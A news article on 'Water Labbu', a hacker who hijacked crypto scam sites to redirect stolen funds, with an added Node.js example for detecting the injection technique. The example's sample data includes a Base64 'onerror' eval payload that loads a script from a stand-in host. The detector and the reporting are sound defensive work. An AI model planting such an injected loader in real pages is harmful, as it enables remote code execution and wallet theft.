
Scammers in the cryptocurrency space are fighting over stolen assets

 

Cybersecurity researchers have identified a hacker who compromised cryptocurrency scam websites and redirected funds that had already been stolen to his own wallets. The scheme had previously brought him hundreds of thousands of dollars.

According to Trend Micro, a threat actor going by the name “Water Labbu” discovered and penetrated 45 scam websites, then replaced the wallet addresses of the victims with his own. In this way, whatever money the con artists trick other people into sending them ultimately ends up in his possession.

The majority of the sites are bogus liquidity mining pools. To build a liquidity pool, legitimate cryptocurrency mining pools require their users to lend their digital assets to decentralized exchanges, which is what allows the pool to operate. Because the liquidity pool exists, cryptocurrency traders can trade their tokens directly (in a decentralized manner, as opposed to a centralized one where a single entity provides the liquidity). The lenders profit by receiving a cut of the trading fees.

Users are required to connect their wallets to the liquidity mining pool before they can lend out their cryptocurrency holdings. Fake websites, on the other hand, do little more than wait for users to link their wallets before emptying them completely. Running such a scam takes a significant amount of work, including creating bogus apps and promoting the fraud on social media. Water Labbu sidesteps all of it, letting the original con artists do the laborious work for him.

“In one of the examples we investigated, Water Labbu manipulated an IMG element to load a Base64-encoded JavaScript payload via the ‘error’ event,” Trend Micro’s study noted.

This is a known XSS evasion method, used to get past Cross-Site Scripting (XSS) filters. The injected payload then creates another script element, which loads yet another script from the delivery server at tmpmeta.com.
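As an added example (not from Trend Micro's report or from this article), the following Node.js code shows one way a site owner could audit page markup for the injection described above: IMG tags whose error handler carries Base64 text that decodes to code creating a script element or naming an external host. The sample markup, the host delivery.example and all function names are constructed for illustration.

```javascript
// Added example: audit markup for <img> error handlers hiding Base64 script loaders.
// Constructed sample data; delivery.example is a placeholder host.
const SAMPLE_LOADER =
  'var s=document.createElement("script");' +
  's.src="https://delivery.example/a.js";document.head.appendChild(s);';
const SAMPLE_HTML = [
  '<img src="/logo.png" alt="logo">',
  '<img src="x" onerror="this.style.display=\'none\'">',
  `<img src="x" onerror="eval(atob('${Buffer.from(SAMPLE_LOADER).toString('base64')}'))">`,
].join('\n');

// Decode a candidate token; return null unless it is valid Base64 of printable text.
function decodeIfBase64(token) {
  const bytes = Buffer.from(token, 'base64');
  const strip = (s) => s.replace(/=+$/, '');
  if (strip(bytes.toString('base64')) !== strip(token)) return null;
  const text = bytes.toString('utf8');
  return /^[\x20-\x7e\s]+$/.test(text) ? text : null;
}

// Return one finding per Base64 token in an <img> onerror handler that decodes
// to code creating a script element or naming an http(s) host.
// Regex-based: assumes quoted attributes with no '>' inside them.
function findSuspiciousImgHandlers(html) {
  const findings = [];
  for (const [tag] of html.matchAll(/<img\b[^>]*>/gi)) {
    const handler = /\bonerror\s*=\s*(?:"([^"]*)"|'([^']*)')/i.exec(tag);
    if (!handler) continue;
    const code = handler[1] ?? handler[2];
    for (const [token] of code.matchAll(/[A-Za-z0-9+\/]{24,}={0,2}/g)) {
      const decoded = decodeIfBase64(token);
      if (!decoded) continue;
      const createsScript = /createElement\(\s*["']script["']\s*\)/i.test(decoded);
      const hosts = [...decoded.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)]
        .map((m) => m[1].toLowerCase());
      if (createsScript || hosts.length) findings.push({ tag, decoded, createsScript, hosts });
    }
  }
  return findings;
}

for (const f of findSuspiciousImgHandlers(SAMPLE_HTML)) {
  console.log('suspicious handler:', f.hosts.join(', ') || '(no host)', '|', f.decoded);
}
```

Comparing the reported hosts against the domains a site is expected to load scripts from separates injected loaders from legitimate fallback handlers.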

The script searches for new wallets that have a balance of at least 0.005 ETH or 22,000 USDT, and then, depending on the platform (Windows or one of the two mobile devices), it either performs the transfer or begins the search again.

Trend Micro reminds users that, to protect themselves from these types of fraud, they should be very careful when linking their wallets and should do their research before handing over any of their tokens.

 

Published by
Fizza Akbar
Tags: crypto scam
